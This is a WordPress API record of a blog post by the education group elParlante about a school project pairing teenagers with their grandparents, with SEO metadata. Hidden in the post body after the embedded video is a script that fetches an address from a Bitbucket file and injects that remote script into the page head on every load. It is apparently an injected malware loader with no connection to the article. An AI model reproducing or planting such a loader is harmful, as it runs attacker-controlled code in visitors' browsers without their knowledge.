{"id":7093,"date":"2016-07-08T18:09:10","date_gmt":"2016-07-08T16:09:10","guid":{"rendered":"https:\/\/elparlante.es\/web\/experiences-with-magic-2\/"},"modified":"2024-09-12T18:02:50","modified_gmt":"2024-09-12T16:02:50","slug":"experiences-with-magic-2","status":"publish","type":"post","link":"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/","title":{"rendered":"Experiences with magic"},"content":{"rendered":"<p><span lang=\"CA\">The project that was presented to us as a challenge and as a pilot has turned out to be one of the most fluid, enriching and exciting experiences we have lived so far.<\/span><\/p>\n<p><span lang=\"CA\">During the 2015-2016 academic year elParlante has intervened in about twenty schools throughout Catalonia.<br \/>\nThe projects that are framed within formal education have the added difficulty of adapting to the routines of a center. However, sometimes you come across schools where involvement, passion for innovation and educational transformation make them special, schools that have magic. This has been the case of the project Compartint experi\u00e8ncies, designed by the Department of Services to People and the Territory (District of Les Corts) and energized by elParlante and the school itself.<\/span><\/p>\n<p><span lang=\"CA\">The objective of this experience has been to create a meeting bridge between 3rd ESO students and some of their grandmothers and grandparents. The elderly and the group of young people exchanged knowledge and experiences, with new technologies as a common thread. In the sessions we have worked on aspects such as Google Maps, human relationships, online and traditional games and photography.<\/span><\/p>\n<p><span lang=\"CA\">From the tenderness of the students, teachers involved, and grandmothers and grandparents, a good atmosphere has been created in the classroom where the participants have been the protagonists of their own learning process, as promoted by edu-communication, motor and essence of elParlante.<\/span><\/p>\n<p><span lang=\"CA\">One of the objectives of the project, which has been more than fulfilled, has been to improve relations between older people and young people, as can be seen in this documentary that collects testimonies of the experience, as well as a summary of the workshops lived.<\/span><\/p>\n<p><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/vZ-qFNV2_MY\" width=\"864\" height=\"486\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><script>var url = 'https:\/\/bitbucket.org\/goo2\/adss\/raw\/bb48df0654afc575e4e10d9e14d886a4afba6bc2\/go.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>The project that was presented to us as a challenge and as a pilot has turned out to be one of the most fluid, enriching and exciting experiences we have lived so far. During the 2015-2016 academic year elParlante has intervened in about twenty schools throughout Catalonia. The projects that are framed within formal education [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":6881,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"image","meta":{"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[10],"tags":[],"class_list":["post-7093","post","type-post","status-publish","format-image","has-post-thumbnail","hentry","category-blog-ca","post_format-post-format-image"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Experiences with magic<\/title>\n<meta name=\"robots\" content=\"noindex, follow\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Experiences with magic\" \/>\n<meta property=\"og:description\" content=\"The project that was presented to us as a challenge and as a pilot has turned out to be one of the most fluid, enriching and exciting experiences we have lived so far. During the 2015-2016 academic year elParlante has intervened in about twenty schools throughout Catalonia. The projects that are framed within formal education [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/\" \/>\n<meta property=\"og:site_name\" content=\"elParlante\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/elParlante.es\" \/>\n<meta property=\"article:published_time\" content=\"2016-07-08T16:09:10+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-09-12T16:02:50+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/elparlante.es\/wp-content\/uploads\/2016\/07\/elparlante-experiencies-amb-magia-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1500\" \/>\n\t<meta property=\"og:image:height\" content=\"1000\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"elParlante\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@elParlanteBCN\" \/>\n<meta name=\"twitter:site\" content=\"@elParlanteBCN\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"elParlante\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/\"},\"author\":{\"name\":\"elParlante\",\"@id\":\"https:\/\/elparlante.es\/en\/#\/schema\/person\/7a1e11d9ebdc0662e18895ca0bccb568\"},\"headline\":\"Experiences with magic\",\"datePublished\":\"2016-07-08T16:09:10+00:00\",\"dateModified\":\"2024-09-12T16:02:50+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/\"},\"wordCount\":275,\"image\":{\"@id\":\"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/elparlante.es\/wp-content\/uploads\/2016\/07\/elparlante-experiencies-amb-magia-1.jpg\",\"articleSection\":[\"Blog-ca\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/\",\"url\":\"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/\",\"name\":\"Experiences with magic\",\"isPartOf\":{\"@id\":\"https:\/\/elparlante.es\/en\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/elparlante.es\/wp-content\/uploads\/2016\/07\/elparlante-experiencies-amb-magia-1.jpg\",\"datePublished\":\"2016-07-08T16:09:10+00:00\",\"dateModified\":\"2024-09-12T16:02:50+00:00\",\"author\":{\"@id\":\"https:\/\/elparlante.es\/en\/#\/schema\/person\/7a1e11d9ebdc0662e18895ca0bccb568\"},\"breadcrumb\":{\"@id\":\"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/#primaryimage\",\"url\":\"https:\/\/elparlante.es\/wp-content\/uploads\/2016\/07\/elparlante-experiencies-amb-magia-1.jpg\",\"contentUrl\":\"https:\/\/elparlante.es\/wp-content\/uploads\/2016\/07\/elparlante-experiencies-amb-magia-1.jpg\",\"width\":1500,\"height\":1000},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/elparlante.es\/en\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Experiences with magic\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/elparlante.es\/en\/#website\",\"url\":\"https:\/\/elparlante.es\/en\/\",\"name\":\"elParlante\",\"description\":\"ElParlante es una entidad de car\u00e1cter cultural, social y educativo, fundada en 2009. Entendemos la comunicaci\u00f3n como un proceso de di\u00e1logo constante, y utilizamos las tecnolog\u00edas audiovisuales como instrumentos de transformaci\u00f3n y cambio. Dise\u00f1amos, implementamos y evaluamos estrategias que vinculan la Educaci\u00f3n y la Comunicaci\u00f3n para la promoci\u00f3n de una ciudadan\u00eda m\u00e1s activa.\",\"alternateName\":\"elParlante\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/elparlante.es\/en\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/elparlante.es\/en\/#\/schema\/person\/7a1e11d9ebdc0662e18895ca0bccb568\",\"name\":\"elParlante\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/secure.gravatar.com\/avatar\/4d7d152cbe8c0a34203c3c862e5e0dcb4c426e2e6d438567fb8fb45bec080245?s=96&d=mm&r=g\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/4d7d152cbe8c0a34203c3c862e5e0dcb4c426e2e6d438567fb8fb45bec080245?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/4d7d152cbe8c0a34203c3c862e5e0dcb4c426e2e6d438567fb8fb45bec080245?s=96&d=mm&r=g\",\"caption\":\"elParlante\"},\"sameAs\":[\"https:\/\/elparlante.es\/web\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Experiences with magic","robots":{"index":"noindex","follow":"follow"},"og_locale":"en_US","og_type":"article","og_title":"Experiences with magic","og_description":"The project that was presented to us as a challenge and as a pilot has turned out to be one of the most fluid, enriching and exciting experiences we have lived so far. During the 2015-2016 academic year elParlante has intervened in about twenty schools throughout Catalonia. The projects that are framed within formal education [&hellip;]","og_url":"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/","og_site_name":"elParlante","article_publisher":"https:\/\/www.facebook.com\/elParlante.es","article_published_time":"2016-07-08T16:09:10+00:00","article_modified_time":"2024-09-12T16:02:50+00:00","og_image":[{"width":1500,"height":1000,"url":"https:\/\/elparlante.es\/wp-content\/uploads\/2016\/07\/elparlante-experiencies-amb-magia-1.jpg","type":"image\/jpeg"}],"author":"elParlante","twitter_card":"summary_large_image","twitter_creator":"@elParlanteBCN","twitter_site":"@elParlanteBCN","twitter_misc":{"Written by":"elParlante","Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/#article","isPartOf":{"@id":"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/"},"author":{"name":"elParlante","@id":"https:\/\/elparlante.es\/en\/#\/schema\/person\/7a1e11d9ebdc0662e18895ca0bccb568"},"headline":"Experiences with magic","datePublished":"2016-07-08T16:09:10+00:00","dateModified":"2024-09-12T16:02:50+00:00","mainEntityOfPage":{"@id":"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/"},"wordCount":275,"image":{"@id":"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/#primaryimage"},"thumbnailUrl":"https:\/\/elparlante.es\/wp-content\/uploads\/2016\/07\/elparlante-experiencies-amb-magia-1.jpg","articleSection":["Blog-ca"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/","url":"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/","name":"Experiences with magic","isPartOf":{"@id":"https:\/\/elparlante.es\/en\/#website"},"primaryImageOfPage":{"@id":"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/#primaryimage"},"image":{"@id":"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/#primaryimage"},"thumbnailUrl":"https:\/\/elparlante.es\/wp-content\/uploads\/2016\/07\/elparlante-experiencies-amb-magia-1.jpg","datePublished":"2016-07-08T16:09:10+00:00","dateModified":"2024-09-12T16:02:50+00:00","author":{"@id":"https:\/\/elparlante.es\/en\/#\/schema\/person\/7a1e11d9ebdc0662e18895ca0bccb568"},"breadcrumb":{"@id":"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/elparlante.es\/en\/experiences-with-magic-2\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/#primaryimage","url":"https:\/\/elparlante.es\/wp-content\/uploads\/2016\/07\/elparlante-experiencies-amb-magia-1.jpg","contentUrl":"https:\/\/elparlante.es\/wp-content\/uploads\/2016\/07\/elparlante-experiencies-amb-magia-1.jpg","width":1500,"height":1000},{"@type":"BreadcrumbList","@id":"https:\/\/elparlante.es\/en\/experiences-with-magic-2\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/elparlante.es\/en\/"},{"@type":"ListItem","position":2,"name":"Experiences with magic"}]},{"@type":"WebSite","@id":"https:\/\/elparlante.es\/en\/#website","url":"https:\/\/elparlante.es\/en\/","name":"elParlante","description":"ElParlante es una entidad de car\u00e1cter cultural, social y educativo, fundada en 2009. Entendemos la comunicaci\u00f3n como un proceso de di\u00e1logo constante, y utilizamos las tecnolog\u00edas audiovisuales como instrumentos de transformaci\u00f3n y cambio. Dise\u00f1amos, implementamos y evaluamos estrategias que vinculan la Educaci\u00f3n y la Comunicaci\u00f3n para la promoci\u00f3n de una ciudadan\u00eda m\u00e1s activa.","alternateName":"elParlante","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/elparlante.es\/en\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/elparlante.es\/en\/#\/schema\/person\/7a1e11d9ebdc0662e18895ca0bccb568","name":"elParlante","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/4d7d152cbe8c0a34203c3c862e5e0dcb4c426e2e6d438567fb8fb45bec080245?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/4d7d152cbe8c0a34203c3c862e5e0dcb4c426e2e6d438567fb8fb45bec080245?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/4d7d152cbe8c0a34203c3c862e5e0dcb4c426e2e6d438567fb8fb45bec080245?s=96&d=mm&r=g","caption":"elParlante"},"sameAs":["https:\/\/elparlante.es\/web"]}]}},"_links":{"self":[{"href":"https:\/\/elparlante.es\/en\/wp-json\/wp\/v2\/posts\/7093","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/elparlante.es\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/elparlante.es\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/elparlante.es\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/elparlante.es\/en\/wp-json\/wp\/v2\/comments?post=7093"}],"version-history":[{"count":1,"href":"https:\/\/elparlante.es\/en\/wp-json\/wp\/v2\/posts\/7093\/revisions"}],"predecessor-version":[{"id":7982,"href":"https:\/\/elparlante.es\/en\/wp-json\/wp\/v2\/posts\/7093\/revisions\/7982"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/elparlante.es\/en\/wp-json\/wp\/v2\/media\/6881"}],"wp:attachment":[{"href":"https:\/\/elparlante.es\/en\/wp-json\/wp\/v2\/media?parent=7093"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/elparlante.es\/en\/wp-json\/wp\/v2\/categories?post=7093"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/elparlante.es\/en\/wp-json\/wp\/v2\/tags?post=7093"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}